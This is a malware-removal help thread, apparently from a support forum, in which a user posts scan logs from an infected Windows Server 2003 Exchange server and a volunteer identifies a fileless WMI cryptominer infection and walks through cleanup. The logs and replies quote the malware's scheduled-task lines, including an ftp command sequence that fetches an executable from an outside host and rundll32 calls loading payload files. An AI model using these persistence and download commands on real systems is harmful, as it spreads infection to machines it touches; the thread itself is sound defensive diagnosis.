Update for Windows Server 2003 (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973825) (HKLM\...\KB973825) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973917) (HKLM\...\KB973917) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973917-v2) (HKLM\...\KB973917-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB977165) (HKLM\...\KB977165) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB978207) (HKLM\...\KB978207) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB980182) (HKLM\...\KB980182) (Version: 1 - Microsoft Corporation)
Update Rollup 5 for Exchange Server 2007 Service Pack 2 (KB2407132) (HKLM\...\KB2407132) (Version: 1 - Microsoft Corporation)
VDS 1.1 Update for R2 (HKLM\...\VDS11R2) (Version:  - Microsoft Corporation)
Windows Imaging Component (HKLM\...\WIC) (Version: 3.0.0.0 - Microsoft Corporation)
Windows Support Tools (HKLM-x32\...\{F07F0BCD-5C6D-4499-9F05-6ED747078A72}) (Version: 5.2.3790.3959 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\defrag X.job => c:\WINDOWS\system32\defrag.exe
Task: C:\WINDOWS\Tasks\defrag.job => c:\WINDOWS\system32\defrag.exe
Task: C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job => C:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: C:\WINDOWS\Tasks\Mysa.job => cmdw c echo open down mysking info echo test echo 1433 echo binary echo get exe echo bye ftp execmdSYSTEM0 <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaarundll32.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat <==== ATTENTION
Task: C:\WINDOWS\Tasks\ok.job => rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaarundll32.exe
Task: C:\WINDOWS\Tasks\rebootORshutdown.job => c:\WINDOWS\system32\shutdown.exe
Task: C:\WINDOWS\Tasks\systemstate.job => C:\WINDOWS\system32\ntbackup.exeŚbackup C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\Microsoft\Windows NT\NTBackup\data\systemstate.bks /n systemstate_MYSERVER-dr-00.bkf created 2/21/2008 at 5:31 PM /d Set created 2/21/2008 at 5:31 PM /v:no /r:no /rs:no /hc:off /m normal /j systemstate /l:s /f x:\backup\systemstate_MYSERVER-exch-01.bkf
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION
 
==================== Loaded Modules (Whitelisted) ==============
 
2009-10-22 10:00 - 2009-10-22 10:00 - 000043432 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\omaep32.dll
2009-10-22 10:10 - 2009-10-22 10:10 - 000055208 _____ () C:\Program Files (x86)\Dell\SysMgt\iws\bin\win32\dsm_om_connsvc32.exe
2009-10-22 10:01 - 2009-10-22 10:01 - 000137128 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\invmib32.dll
2009-06-15 14:54 - 2009-06-15 14:54 - 000975872 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\libxml2.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\UploadMgr => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2007-12-10 09:48 - 2007-02-18 00:00 - 000000734 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1085031214-630328440-682003330-500\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.100.10
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
DomainProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe] => Enabled:Backup Exec Remote Agent for Windows Systems
DomainProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\VxGather.exe] => Enabled:Backup Exec Diagnostic Gathering Utility
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Mozilla Firefox\firefox.exe] => Enabled:Firefox (C:\Program Files (x86)\Mozilla Firefox)
StandardProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe] => Enabled:Backup Exec Remote Agent for Windows Systems
StandardProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\VxGather.exe] => Enabled:Backup Exec Diagnostic Gathering Utility
DomainProfile\GloballyOpenPorts: [3389:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22009
DomainProfile\GloballyOpenPorts: [139:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22004
DomainProfile\GloballyOpenPorts: [445:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22005
DomainProfile\GloballyOpenPorts: [137:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22001
DomainProfile\GloballyOpenPorts: [138:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22002
StandardProfile\GloballyOpenPorts: [3389:TCP] => :192.168.100.163/255.255.255.255:Enabled:@xpsp2res.dll,-22009
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.
 
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client) #2
Description: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Broadcom Corporation
Service: l2nd
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Intel® PRO/1000 PT Dual Port Server Adapter #2
Description: Intel® PRO/1000 PT Dual Port Server Adapter
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Intel
Service: e1express
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Description: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Broadcom Corporation
Service: l2nd
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/11/2017 08:32:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.
Processing media-specific event for [lsmose.exe!ws!]
 
Error: (09/11/2017 05:32:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.
Processing media-specific event for [lsmose.exe!ws!]
 
Error: (09/11/2017 05:12:13 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/10/2017 05:08:12 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/09/2017 05:06:09 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
 
System errors:
=============
Error: (09/11/2017 08:34:47 AM) (Source: TermService) (EventID: 1041) (User: )
Description: Autoreconnect failed to reconnect user to session because authentication failed. (0x0)
The system has failed to hibernate (The error code is %hs).  Hibernation will be disabled until the system is restarted.
 
Error: (09/11/2017 05:12:09 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/10/2017 07:49:32 PM) (Source: Schannel) (EventID: 4106) (User: )
Description: An SSL connection request was received from a remote client application, but none
of the cipher suites supported by the client application are supported by the
server. The SSL connection request has failed.
 
Error: (09/10/2017 06:14:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/10/2017 05:08:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/09/2017 07:48:25 PM) (Source: Schannel) (EventID: 4106) (User: )
Description: An SSL connection request was received from a remote client application, but none
of the cipher suites supported by the client application are supported by the
server. The SSL connection request has failed.
 
Error: (09/09/2017 06:10:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/09/2017 05:06:05 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/08/2017 07:52:40 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 0.0.0.0
 
Update Source: Microsoft Malware Protection Center
 
Update Stage: Search
 
 
Signature Type: AntiSpyware
 
Update Type: Full
 
User: CENTRECITY\administrator
 
Current Engine Version: 
 
Previous Engine Version: 0.0.0.0
 
Error code: 0x80090326
 
Error description: The message received was unexpected or badly formatted.
 
Error: (09/08/2017 07:52:40 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 0.0.0.0
 
Update Source: Microsoft Malware Protection Center
 
Update Stage: Search
 
 
Signature Type: AntiVirus
 
Update Type: Full
 
User: CENTRECITY\administrator
 
Current Engine Version: 
 
Previous Engine Version: 0.0.0.0
 
Error code: 0x80090326
 
Error description: The message received was unexpected or badly formatted.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Xeon® CPU E5345 @ 2.33GHz
Percentage of memory in use: 92%
Total physical RAM: 16378.64 MB
Available physical RAM: 1294.25 MB
Total Virtual: 40335.16 MB
Available Virtual: 23056.78 MB
 
==================== Drives ================================
 
Drive c: (System) (Fixed) (Total:130.25 GB) (Free:97.02 GB) NTFS
Drive d: (Info Store) (Fixed) (Total:837.24 GB) (Free:451.25 GB) NTFS
Drive s: () (Network) (Total:1024.01 GB) (Free:171.78 GB) 
Drive x: (backup) (Fixed) (Total:5.83 GB) (Free:3.67 GB) NTFS
Drive z: (SWAP) (Fixed) (Total:136.12 GB) (Free:110.65 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 136.1 GB) (Disk ID: 00000080)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=130.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=5.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 837.3 GB) (Disk ID: CDF0D823)
Partition 1: (Not Active) - (Size=837.2 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 136.1 GB) (Disk ID: BFB7ABC1)
Partition 1: (Not Active) - (Size=136.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 11 September 2017 - 07:10 PM

Hi adalta :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Sadly there's nothing we can do right now to help you remove the infection. The tools we use don't support Windows Server, and since these are heavily customised, there's no way for us to tell what's legitimate and what isn't. However, I can tell you that what you're infected with is the infection right here:

http://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/

It contains all the information and technical details you need to remove the infection. Such as the files, paths, tasks, WMI entry, etc. Traces in your logs includes but aren't limited to:
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job
2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job
Task: C:\WINDOWS\Tasks\Mysa.job => cmdw c echo open down mysking info echo test echo 1433 echo binary echo get exe echo bye ftp execmdSYSTEM0 <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaarundll32.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat <==== ATTENTION
Task: C:\WINDOWS\Tasks\ok.job => rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaarundll32.exe
WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION
With that information, you should be able to manually clean the server. The key here is to get rid of the WMI entry. You can follow this guide for explanations (though you'll look for a different one, called bleepyoumm2).

https://www.bleepingcomputer.com/news/security/yeabests-cc-a-fileless-infection-using-wmi-to-hijack-your-browser/

If you need more information, let me know.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 13 September 2017 - 12:21 PM

Thank you Aura.

 

I ran wbemtest and removed "ActiveScriptEventConsumer.Name="f***youmm2_consumer"

I ran Shortcut Cleaner and nothing found

I ran Zemana AntiMalware (free) and found the following:

Internet Explorer Homepage - Suspicious Browser Setting
 
Internet Explorer URL - Suspicious Browser Setting
res://shdock.dll/softadmin.htm
 
ntdll.dll - Hollow Process
c:\WINDOWS\system32\ntdll.dll
 
 
> "The key here is to get rid of the WMI entry. You can follow this guide for explanations (though you'll look for a different one, called bleepyoumm2)."
I did not see a bleepyoumm2 entry in wbemtest. I did see a "f***youmm2_consumer" entry and I removed. 
 
I removed the tasks:
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job

2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job

 

EDIT: added the info below.

 

Additionally, I found this folder with the lsmose.exe file. Do I remove this?

 

C:\WINDOWS\Debug>dir

 Volume in drive C is System
 Volume Serial Number is F0A4-5055
 
 Directory of C:\WINDOWS\Debug
 
09/11/2017  10:45 AM    <DIR>          .
09/11/2017  10:45 AM    <DIR>          ..
12/18/2007  09:28 PM           196,194 cysui.001.log
01/03/2008  12:06 PM           133,526 cysui.log
09/11/2017  05:32 AM         1,870,336 lsmose.exe
08/18/2016  01:56 PM            58,476 mrt.log
04/11/2012  03:47 AM            14,486 mrteng.log
09/12/2017  09:53 AM               858 msert.log
12/14/2007  09:16 PM                 0 Netlogon.log
12/14/2007  09:16 PM            10,588 NetSetup.LOG
09/13/2017  10:00 AM               182 PASSWD.LOG
12/10/2007  07:40 PM             4,808 SecOOBE.log
09/13/2017  10:21 AM    <DIR>          UserMode
12/10/2007  07:21 PM    <DIR>          WPD
              10 File(s)      2,289,454 bytes
               4 Dir(s)  107,226,417,152 bytes free
 
C:\WINDOWS\Debug>
 
 
The passwd.log file contains
09/13 10:00:11 Attempting password change server/domain \\CCDC-EXCH-01 for user ASPNET
09/13 10:00:11 SamChangePasswordUser2 on machine \\CCDC-EXCH-01 for user ASPNET returned 0x0
 
 
What do you suggest my next step be? Thank you again for your professional help.

Edited by adalta, 13 September 2017 - 12:26 PM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 13 September 2017 - 12:25 PM

The "bleepyoumm2" WMI entry was the "f**kyoumm2" one. It shows as bleep here because of the profanity filter.

Did you delete the .dat files inside the C:\Windows\debug folder? If you're not sure which ones to remove, you can list them here (using dir /a C:\Windows\debug from an elevated command prompt).

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 13 September 2017 - 01:19 PM

Funny.. 

 

I don't see .dat files in the C:\WINDOWS\Debug\ folder. I only see .log, .exe and folders which contain other .log and .bak files.

 

Thanks



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 13 September 2017 - 01:21 PM

Do you have hidden and system files view enabled in the Folder Options? You don't see these files?
C:\windows\debug\item.dat
C:\windows\debug\ok.dat

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 13 September 2017 - 04:26 PM

Correct. Hidden\system files are showing and I do not see those files.

 

I did RDP into the machine a second time and received the lsmose.exe popup again "lsmose.exe encountered a problem and needed to close (I can't upload a screenshot).

 

https://drive.google.com/file/d/0B0gl0f4--8phLVcxSWxUZFM2S1E/view?usp=sharing

 

Thanks



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 13 September 2017 - 07:04 PM

This was 2 days ago though according to the screenshot. Also, can you empty the Temp folder (%LocalAppData%\Temp)?

Edited by Aura, 13 September 2017 - 07:04 PM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 14 September 2017 - 11:21 AM

Good catch. I'm hoping it was just another RDP session I logged into with the "old" infection.

 

I do not see an "AppData\Temp" folder.

https://drive.google.com/file/d/0B0gl0f4--8phRkFuTkx1RmowZ2M/view?usp=sharing

 

I do see:

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\ (no temp folder)

C:\Documents and Settings\desktop\Application Data\ (no temp folder)

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp

C:\Documents and Settings\desktop\Local Settings\Temp (already empty)

C:\Documents and Settings\Administrator\Application Data (no temp folder)

C:\Documents and Settings\Administrator\Local Settings\Temp

 

Thanks



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 14 September 2017 - 11:38 AM

True, we're talking about a Windows Server 2003 machine here. The "Local Settings\Temp" folder is what we're looking for. This one specifically.
C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 14 September 2017 - 01:23 PM

Ok, I've emptied the folder:

C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp.

 

What is odd is the lsmose.exe pops up again with the 9/11 date:

https://drive.google.com/file/d/0B0gl0f4--8phcVNxd0VwT2lZa0U/view?usp=sharing

 

Also, I'm seeing less MS Antimalware warnings. The two today and two yesterday are below. Are they false positives? We use Trend Micro ScanMail (SMEX) for email scanning.

 

What do you suggest my next steps are?

 

Event Viewer screen shot filtered to 1116 and text of the events below:

https://drive.google.com/open?id=0B0gl0f4--8phM1J0eDFjRlFXRm8

 

 

 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/14/2017
Time: 6:26:42 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
